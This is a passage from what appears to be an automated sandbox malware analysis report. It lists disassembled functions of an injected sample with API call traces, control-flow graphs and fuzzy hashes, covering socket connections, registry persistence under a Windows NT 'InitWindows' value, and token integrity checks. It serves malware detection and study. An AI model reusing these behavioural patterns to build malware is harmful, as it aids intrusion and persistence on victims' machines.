                                                                            • ReleaseMutex.KERNEL32(?), ref: 00405A1B
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MutexObjectReleaseSingleWaitconnectfreeaddrinfogetaddrinfohtonslstrcatsocket
                                                                            • String ID:
                                                                            • API String ID: 2516106447-0
                                                                            • Opcode ID: c258d490acdb0b488783c694752f3a28ef6200513261933e4d17fdd22df78f8b
                                                                            • Instruction ID: 9847916f8b98b7b597607d954632222e8a2bcfa95c272735c2b26949272ee6fd
                                                                            • Opcode Fuzzy Hash: c258d490acdb0b488783c694752f3a28ef6200513261933e4d17fdd22df78f8b
                                                                            • Instruction Fuzzy Hash: DD219C71A00208ABDF10DF65CC88BDA7BB9EF44324F10856AFD19EB2A1D7359A41DF64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405E28 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 410 405e28-405e3b GetCommandLineA 411 405e65-405e67 410->411 412 405e3d-405e42 410->412 415 405e62-405e63 411->415 416 405e69 411->416 413 405e44 412->413 414 405e55-405e60 412->414 417 405e46-405e4a 413->417 418 405e70 414->418 415->411 419 405e72-405e74 416->419 417->414 422 405e4c-405e53 417->422 418->419 420 405e76-405ea2 GetStartupInfoA call 405eb6 call 405ee3 GetModuleHandleA call 4154eb 419->420 421 405e6b-405e6d 419->421 429 405ea7-405eaf call 405ecb ExitProcess 420->429 421->420 424 405e6f 421->424 422->414 422->417 424->418
                                                                            APIs
                                                                            • GetCommandLineA.KERNEL32 ref: 00405E2F
                                                                            • GetStartupInfoA.KERNEL32(?), ref: 00405E7E
                                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 00405E9A
                                                                            • ExitProcess.KERNEL32 ref: 00405EAF
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                            • String ID:
                                                                            • API String ID: 2164999147-0
                                                                            • Opcode ID: 03e413eae8a4ea63490194bdb283974b75a2e54e2929799594d1208bb41f8623
                                                                            • Instruction ID: 79012c7e925f986a536a85d8df8cd7193993c2d42f70a77d9956ba037c84b5bc
                                                                            • Opcode Fuzzy Hash: 03e413eae8a4ea63490194bdb283974b75a2e54e2929799594d1208bb41f8623
                                                                            • Instruction Fuzzy Hash: DE010434108A444ED7206B74D8863EB3FA6DB1A348B68107EE1C5A7382C63E0E478EDD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004134A2 Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 432 4134a2-4134da call 401085 CreateFileA 435 4134dc 432->435 436 4134df-4134fb GetFileSize ReadFile 432->436 435->436 437 4134fd 436->437 438 4134ff-41350c FindCloseChangeNotification 436->438 437->438
                                                                            APIs
                                                                              • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                              • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                            • CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,00415553), ref: 004134CF
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,00415553), ref: 004134F3
                                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000,?,?,00415553), ref: 00413500
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$Heap$AllocateChangeCloseCreateFindNotificationProcessReadSize
                                                                            • String ID:
                                                                            • API String ID: 2557216016-0
                                                                            • Opcode ID: acc67c7317e70eea7451c17902bc0e4f69181cd995ee4df2eb362c61f509b136
                                                                            • Instruction ID: aa115e6f790b4d38b1fbeae35b29bc5e12f96e584a277f2799dc653a56db372b
                                                                            • Opcode Fuzzy Hash: acc67c7317e70eea7451c17902bc0e4f69181cd995ee4df2eb362c61f509b136
                                                                            • Instruction Fuzzy Hash: E1F0AFB2605210BFE3215B35AC09FFB76ACDB54725F204135FA41E62C0EBB45E0086A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041111B Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 439 41111b-41113c GetCurrentProcess OpenProcessToken 440 41115e-411162 439->440 441 41113e-41115a GetTokenInformation 439->441 442 411164-411167 FindCloseChangeNotification 440->442 443 41116d-411176 440->443 441->440 442->443
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,77C30770,00000000,77C30770,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                                                            • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00411167
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ProcessToken$ChangeCloseCurrentFindInformationNotificationOpen
                                                                            • String ID:
                                                                            • API String ID: 2406157124-0
                                                                            • Opcode ID: e114797ed7bb71c60c3d08b110eba96b8ccbcffbddbf2284c9e0a1db07d94dea
                                                                            • Instruction ID: 0771c0d2f46ea20c01bd2ae64a6620b8b7ded6cbafb58bfe859f8e00c08c725d
                                                                            • Opcode Fuzzy Hash: e114797ed7bb71c60c3d08b110eba96b8ccbcffbddbf2284c9e0a1db07d94dea
                                                                            • Instruction Fuzzy Hash: 87F0F971E00218FBDB119BA0DD09BDEBBB8EF08751F118065EA01E61A0D7709F84DAA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00412612 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 444 412612-412622 445 412624-412630 call 410c50 444->445 446 412657-412669 RegOpenKeyExW 444->446 445->446 452 412632-41264e RegCreateKeyExW 445->452 448 41266b-41266c 446->448 449 41266e 446->449 451 412670-412674 448->451 449->451 452->449 453 412650-412652 call 412554 452->453 453->446
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(77C30770,00000000,00000000,?,?,?,?,?VA,?,00412B64,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 00412661
                                                                              • Part of subcall function 00410C50: RegOpenKeyExW.ADVAPI32(77C30770,00000000,00000000,00020019,00000000,77C30770,?,0041262E,?,?,?VA,?,00412B64,80000001,?,000F003F), ref: 00410C66
                                                                            • RegCreateKeyExW.ADVAPI32(77C30770,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?VA,?,00412B64,80000001,?), ref: 00412646
                                                                              • Part of subcall function 00412554: RegCloseKey.KERNELBASE(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Open$CloseCreate
                                                                            • String ID: ?VA
                                                                            • API String ID: 1752019758-1028452459
                                                                            • Opcode ID: 29839ccb8850909feca5f7e178c66ded91a73c690c585cbb959138e2f25b0d0e
                                                                            • Instruction ID: 4932445430126be2ff0c3f65702f86cceb6eb04fd32848aa65fa8fc0dd82d40c
                                                                            • Opcode Fuzzy Hash: 29839ccb8850909feca5f7e178c66ded91a73c690c585cbb959138e2f25b0d0e
                                                                            • Instruction Fuzzy Hash: 5A01197120020EBFAB119F62DE84DFB7B6EEF44398B10402AF905D1250E7B5CDA19AB5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405B4E Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 158sleepCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • Sleep.KERNELBASE(000001F4,00000000,77C30770,00000000), ref: 00405B64
                                                                              • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,77C30770,?,00405B8D,.bss,00000000), ref: 004034DA
                                                                              • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                                                              • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcpylstrlen$FreeSleepVirtual
                                                                            • String ID: .VA$.bss
                                                                            • API String ID: 277671435-4282314365
                                                                            • Opcode ID: f19535f46ae96ff707ef146c405b4aced662b2af91d2551e04977e562a3fa7a4
                                                                            • Instruction ID: d77f0bc86c0f0e09d154f713c611f4ee480ed774d1177d5a26b30425dba20ef3
                                                                            • Opcode Fuzzy Hash: f19535f46ae96ff707ef146c405b4aced662b2af91d2551e04977e562a3fa7a4
                                                                            • Instruction Fuzzy Hash: 8C516671900519AFCB15EFA1C8D18EEBBB9EF44308B1041BEE406AB296DF34AB45CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004031AF Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 0040319E: lstrlenA.KERNEL32(00000000,004031C6,77C30770,00000000,00000000, 6@,004033EE, 6@,00000000,-00000001,77C30770,?,00403620,00000000,?,?), ref: 004031A5
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,-00000002,00000000,00000000,77C30770,00000000,00000000, 6@,004033EE, 6@,00000000,-00000001,77C30770), ref: 004031DC
                                                                              • Part of subcall function 00405F68: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,004034F4,?,00405B8D,.bss,00000000), ref: 00405F76
                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,00403620,00000000,?,?,77C30770,00000000), ref: 00403207
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$ByteCharMultiVirtualWide$AllocDispatcherExceptionFreeUserlstrcpy
                                                                            • String ID: 6@
                                                                            • API String ID: 2128046513-952913687
                                                                            • Opcode ID: 2b79037b742289ec2611566c79040ddf19f25a4ef00d7f821399da99d6758848
                                                                            • Instruction ID: d9978922c9701d3022712c3417eb10aadbb871c603d42485b42bce1279e5fb8f
                                                                            • Opcode Fuzzy Hash: 2b79037b742289ec2611566c79040ddf19f25a4ef00d7f821399da99d6758848
                                                                            • Instruction Fuzzy Hash: EB019231600114BBCB14EFA6CC86D9E3AADDF09759B00007AF502AB3D1CA788E0087A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004036F7 Relevance: 4.5, APIs: 3, Instructions: 23stringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 00405F68: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,004034F4,?,00405B8D,.bss,00000000), ref: 00405F76
                                                                            • lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$AllocDispatcherExceptionUserVirtual
                                                                            • String ID:
                                                                            • API String ID: 4104320610-0
                                                                            • Opcode ID: 96b2e3897768bbd6e10730d6ed17acb4c112f255b8150d38640a79b50927bcda
                                                                            • Instruction ID: d87089fda059f3a9f0aa326a45a2dd5dbcd19400e603affda063e63bb9935f18
                                                                            • Opcode Fuzzy Hash: 96b2e3897768bbd6e10730d6ed17acb4c112f255b8150d38640a79b50927bcda
                                                                            • Instruction Fuzzy Hash: E6E09235140209ABCF015F61EC0DD8D3F39EBC4351B00443AF90182270CF369560CB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004109A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                              • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,?VA,?,00412BF1,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,InitWindows), ref: 004109C1
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                              • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                                                              • Part of subcall function 00401099: RtlFreeHeap.NTDLL(00000000), ref: 004010A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$FreeProcesslstrlen$AllocateDispatcherExceptionFileModuleNameUserVirtuallstrcpy
                                                                            • String ID: ?VA
                                                                            • API String ID: 3831115454-1028452459
                                                                            • Opcode ID: 5e9790b0f14f75e7de37d6df4a049945b021b0a9b244203bc4b82d125c1b0ceb
                                                                            • Instruction ID: a8e575aaac2c0b60fdd0bfa417f7cf0f615c7bb468fc2b6995dd3cebff2648c5
                                                                            • Opcode Fuzzy Hash: 5e9790b0f14f75e7de37d6df4a049945b021b0a9b244203bc4b82d125c1b0ceb
                                                                            • Instruction Fuzzy Hash: 5AE06D626042107BD214B767EC17FAF3AADCF8136AF00003EF545A62D1DEB85A0086A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403447 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00403373: lstrlenW.KERNEL32(77C30770,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,77C30770,00000000), ref: 0040337A
                                                                            • lstrcatW.KERNEL32(00000000,77C30770), ref: 00403477
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcatlstrlen
                                                                            • String ID: ?VA
                                                                            • API String ID: 1475610065-1028452459
                                                                            • Opcode ID: 2f3517887fd5a0b623de7eb871a814aad56a43f5e694413d6d57f4bdb99eb0b7
                                                                            • Instruction ID: 49b9b30c5e13f085cb611e028f6c6d6892849633b3b038c637a710d95911752b
                                                                            • Opcode Fuzzy Hash: 2f3517887fd5a0b623de7eb871a814aad56a43f5e694413d6d57f4bdb99eb0b7
                                                                            • Instruction Fuzzy Hash: 02E0D8327042105BCB106B66D8C496E7B5DEF853A0704043AF90597250DE785C0096E8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403666 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00403373: lstrlenW.KERNEL32(77C30770,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,77C30770,00000000), ref: 0040337A
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00404FB1,?), ref: 00403693
                                                                              • Part of subcall function 00405FFA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00403764,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,77C30770,00000000), ref: 00406004
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 004036BE
                                                                              • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,77C30770,?,00405B8D,.bss,00000000), ref: 004034DA
                                                                              • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                                                              • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
                                                                              • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,77C30770,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$ByteCharMultiVirtualWide$AllocFreelstrcatlstrcpy
                                                                            • String ID:
                                                                            • API String ID: 346377423-0
                                                                            • Opcode ID: 33dd4bd5d87851eb0de9a761e9b01817b2e54de34538e841d73ad23b70dc114d
                                                                            • Instruction ID: c7d19490b4b7bf55ff7d061cd44103b5bbdd205034f2344246e6d9ab79f340c2
                                                                            • Opcode Fuzzy Hash: 33dd4bd5d87851eb0de9a761e9b01817b2e54de34538e841d73ad23b70dc114d
                                                                            • Instruction Fuzzy Hash: 5C014071301624BBDB15AFA5CC86EEE7A6D9F09755F10007AB906BB2C1CE785E0097A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00411E88 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcmp
                                                                            • String ID: Q2A
                                                                            • API String ID: 1534048567-2123675874
                                                                            • Opcode ID: 1fb8e036476019f25356a9dc81369f227010c5da235d04cad098e43340ef1dac
                                                                            • Instruction ID: 7fcb071e5c92ef35872f29a83e6c265051a50058f6c1314db27c30e181e4f5fe
                                                                            • Opcode Fuzzy Hash: 1fb8e036476019f25356a9dc81369f227010c5da235d04cad098e43340ef1dac
                                                                            • Instruction Fuzzy Hash: 64015672A00618AFCB11DF9AC881DEAB7B8FF45304B10017AEA01D3711E734ED95CBA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041338D Relevance: 3.0, APIs: 2, Instructions: 14sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CountSleepTick
                                                                            • String ID:
                                                                            • API String ID: 2804873075-0
                                                                            • Opcode ID: 62ba6aea4ccaa183db535f1184d9731aabb142e05b2b2deef58fc80dffe5c418
                                                                            • Instruction ID: cb4e42e87864ed722aedde75ee5ec1912828b431a3830261680a48f961af466f
                                                                            • Opcode Fuzzy Hash: 62ba6aea4ccaa183db535f1184d9731aabb142e05b2b2deef58fc80dffe5c418
                                                                            • Instruction Fuzzy Hash: EDD0123035C104AFE30C9B59FC5E7A57A6ED7D5705F04C03BF60EC92E1C9B195554598
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004117A2 Relevance: 3.0, APIs: 2, Instructions: 8synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReleaseMutex.KERNEL32(?,?,0041141C,.VA,00405D32,.VA,00000000,00000000,00000000,00000000,?,?,?,?,00000000,.bss), ref: 004117A7
                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 004117AF
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ChangeCloseFindMutexNotificationRelease
                                                                            • String ID:
                                                                            • API String ID: 4264517613-0
                                                                            • Opcode ID: 9070c27b8a4b9f148fcf1c292b5093e63aa80bcd4563dcd4d2d625aad2e24fc1
                                                                            • Instruction ID: da85866315e866d9b3d8c4bbf16f7db246e1d0e2a6d46926b2ed1ada722145db
                                                                            • Opcode Fuzzy Hash: 9070c27b8a4b9f148fcf1c292b5093e63aa80bcd4563dcd4d2d625aad2e24fc1
                                                                            • Instruction Fuzzy Hash: FFB0923A009020EFEB222F14FC0C8C4BBB5EF0925131185BAF08182138CBB20C519B94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406034 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,?,00403156,?,00405D68,00000000,?,00412694,?,?,0041577A), ref: 00406037
                                                                            • RtlFreeHeap.NTDLL(00000000,?,?,0041577A), ref: 0040603E
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$FreeProcess
                                                                            • String ID:
                                                                            • API String ID: 3859560861-0
                                                                            • Opcode ID: 23d5df900dac21bab6a333045b0a5e3ddfb1a785034aa4cb4a057aa396afd6b2
                                                                            • Instruction ID: 97b5132d47626f22dbbfebbef4f37b02692f87ed7e1fea3e09d59c323e792602
                                                                            • Opcode Fuzzy Hash: 23d5df900dac21bab6a333045b0a5e3ddfb1a785034aa4cb4a057aa396afd6b2
                                                                            • Instruction Fuzzy Hash: 27A002719682009BDE5467B09E0DB563939A748702F048554B20985151D67454018675
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401085 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocateProcess
                                                                            • String ID:
                                                                            • API String ID: 1357844191-0
                                                                            • Opcode ID: 361bd0a745674208a41a1b438dab8da89b21d4b91da0fe10cf2071da8b51176b
                                                                            • Instruction ID: edbd1dd06743cb7a1a2c428d36d16fad14126cf83079969d3a169869f5bf1203
                                                                            • Opcode Fuzzy Hash: 361bd0a745674208a41a1b438dab8da89b21d4b91da0fe10cf2071da8b51176b
                                                                            • Instruction Fuzzy Hash: 06B00275558200ABDE516BA09F0DB597A75AB48702F048594B24585060C77544519B66
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401099 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                                                            • RtlFreeHeap.NTDLL(00000000), ref: 004010A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$FreeProcess
                                                                            • String ID:
                                                                            • API String ID: 3859560861-0
                                                                            • Opcode ID: 156927e372652f8f96686f521bc17954d918b764854843aced2cc5c601c062f1
                                                                            • Instruction ID: 09f30d6fdcf717ce78d405049944c27f2579c0e41645bb3766fd1bc4e6a3bb9f
